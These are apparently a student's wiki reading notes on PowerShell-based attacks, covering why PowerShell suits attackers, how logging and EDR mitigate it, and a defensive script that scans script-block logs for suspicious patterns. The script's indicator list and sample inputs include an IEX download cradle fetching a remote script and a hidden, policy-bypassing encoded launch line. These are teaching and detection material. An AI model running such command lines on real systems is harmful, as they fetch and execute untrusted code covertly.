401 Class 20: Remote Code Execution - nataliabdallah/codefellows-ops-reading-notes GitHub Wiki


Reading Cyber Threat Analyst: Key Job Skills and Expected Salary

Tracking, Detecting, and Thwarting PowerShell-based Malware and Attacks

You just got a new job as a Cyber Threat Analyst, how would you explain your role to a family member?

  • I get paid to make sure the company's data on its computers and systems is secure. I do this by studying and analyzing past threats the company has faced, and threats that similar companies have faced, and by implementing known practices and policies so we keep up with the latest security measures. I also learn how to deal with any new vulnerabilities that arise and come up with a plan to fortify the company against them.

Explain what makes PowerShell such an effective attack vector.

  • PowerShell is a scripting shell that ships with every modern Windows system, is signed by Microsoft and is trusted by default, so an attacker does not need to bring a tool of their own. A script is just text, typed or pasted, but it gets full access to .NET, WMI, COM and the Windows API, so it can do anything an administrator can do, faster and at scale. It can download and run code entirely in memory without writing a file to disk, and it accepts Base64-encoded and obfuscated commands, which defeats simple signature matching. Because it is a legitimate administrative tool, its activity blends in with normal operations, and it is most effective against organizations that have not restricted or logged its use.

What are two things you can do to mitigate attacks that leverage PowerShell?

  1. Turn on PowerShell logging and centrally collect it: Script Block Logging (event ID 4104, the full text of each script block, including de-obfuscated blocks), Module Logging (event ID 4103, pipeline execution details) and transcription, forwarded to a SIEM so the activity is actually reviewed.
  2. Deploy controls that block and alert rather than only record: AMSI-integrated antimalware or EDR that inspects script content at run time, Constrained Language Mode or AppLocker/WDAC policies that limit what unsigned scripts can do, and detection rules that fire on patterns of known attacks such as encoded commands, download cradles, hidden windows and execution-policy bypasses.
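The following is an added example, not part of the original notes or of either reading: it enables Script Block Logging, Module Logging and transcription through the policy registry keys, then scores PowerShell script blocks against a small set of indicators that reflect the attack patterns described above (encoded commands, download cradles, Invoke-Expression, hidden windows, execution-policy bypass). The indicator list, the score threshold of 2 and the transcript directory are assumptions to tune for your environment; the sample script blocks at the end are constructed, not captured events.

```powershell
# Added example: enable PowerShell attack logging and scan 4104 script blocks.
# Requires an elevated session to write the policy keys.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PSAttackLogging {
    # Script Block Logging: full text of every script block -> event ID 4104
    $sbl = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $sbl -Force | Out-Null
    Set-ItemProperty -Path $sbl -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

    # Module Logging for all modules: pipeline execution details -> event ID 4103
    $ml = Join-Path $PolicyRoot 'ModuleLogging'
    New-Item -Path (Join-Path $ml 'ModuleNames') -Force | Out-Null
    Set-ItemProperty -Path $ml -Name 'EnableModuleLogging' -Value 1 -Type DWord
    Set-ItemProperty -Path (Join-Path $ml 'ModuleNames') -Name '*' -Value '*' -Type String

    # Transcription: over-the-shoulder record of every session (assumed directory)
    $tr = Join-Path $PolicyRoot 'Transcription'
    New-Item -Path $tr -Force | Out-Null
    Set-ItemProperty -Path $tr -Name 'EnableTranscripting' -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name 'EnableInvocationHeader' -Value 1 -Type DWord
    Set-ItemProperty -Path $tr -Name 'OutputDirectory' -Value 'C:\PSTranscripts' -Type String
}

# Assumed indicator list: common PowerShell tradecraft, not an exhaustive signature set.
$SuspiciousPatterns = @(
    @{ Name = 'EncodedCommand';   Regex = '(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'DownloadCradle';   Regex = '(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|iwr|curl)\b' }
    @{ Name = 'InvokeExpression'; Regex = '(?i)\b(iex|Invoke-Expression)\b' }
    @{ Name = 'HiddenWindow';     Regex = '(?i)-w(indowstyle)?\s+hidden' }
    @{ Name = 'BypassPolicy';     Regex = '(?i)-(ep|executionpolicy)\s+bypass' }
    @{ Name = 'ReflectiveLoad';   Regex = '(?i)\[Reflection\.Assembly\]::Load|FromBase64String' }
)

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptText)
    # @() keeps Count at 0 when nothing matches (a bare $null would count as 1)
    $hits = @(foreach ($p in $SuspiciousPatterns) {
        if ($ScriptText -match $p.Regex) { $p.Name }
    })
    [pscustomobject]@{
        Score      = $hits.Count
        Indicators = $hits
        Suspicious = ($hits.Count -ge 2)   # assumed threshold: two indicators = alert
    }
}

function Get-SuspiciousScriptBlockEvents {
    param([int]$MaxEvents = 500, [string]$ComputerName = $env:COMPUTERNAME)
    # Only meaningful once Script Block Logging is enabled; 4104 events carry the
    # script text in the third property (MessageNumber, MessageTotal, ScriptBlockText, ...)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text   = [string]$_.Properties[2].Value
            $result = Test-SuspiciousScriptBlock -ScriptText $text
            if ($result.Suspicious) {
                [pscustomobject]@{
                    TimeCreated = $_.TimeCreated
                    Computer    = $_.MachineName
                    Score       = $result.Score
                    Indicators  = ($result.Indicators -join ',')
                    ScriptText  = $text
                }
            }
        }
}

# Constructed sample script blocks (not real captured events); the Base64 payload
# is a placeholder, not an encoding of a real command.
$Samples = @(
    'Get-ChildItem C:\Users | Sort-Object LastWriteTime'
    'powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAp'
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
)

foreach ($s in $Samples) {
    $r = Test-SuspiciousScriptBlock -ScriptText $s
    '{0,-6} score={1} indicators={2}' -f $(if ($r.Suspicious) { 'ALERT' } else { 'ok' }), $r.Score, ($r.Indicators -join ',')
}
```

Run `Enable-PSAttackLogging` once (elevated) and reboot or wait for policy refresh, then `Get-SuspiciousScriptBlockEvents` on a host or in a scheduled collection job. Against the constructed samples the first line scores 0, the second 3 (EncodedCommand, HiddenWindow, BypassPolicy) and the third 2 (DownloadCradle, InvokeExpression). Pattern matching on script text is a first line of detection, not a complete one: an attacker can split or obfuscate these strings, which is why the logging should feed a SIEM with correlation rules and why an AMSI-aware EDR that sees the de-obfuscated code at run time is the second mitigation rather than an optional extra.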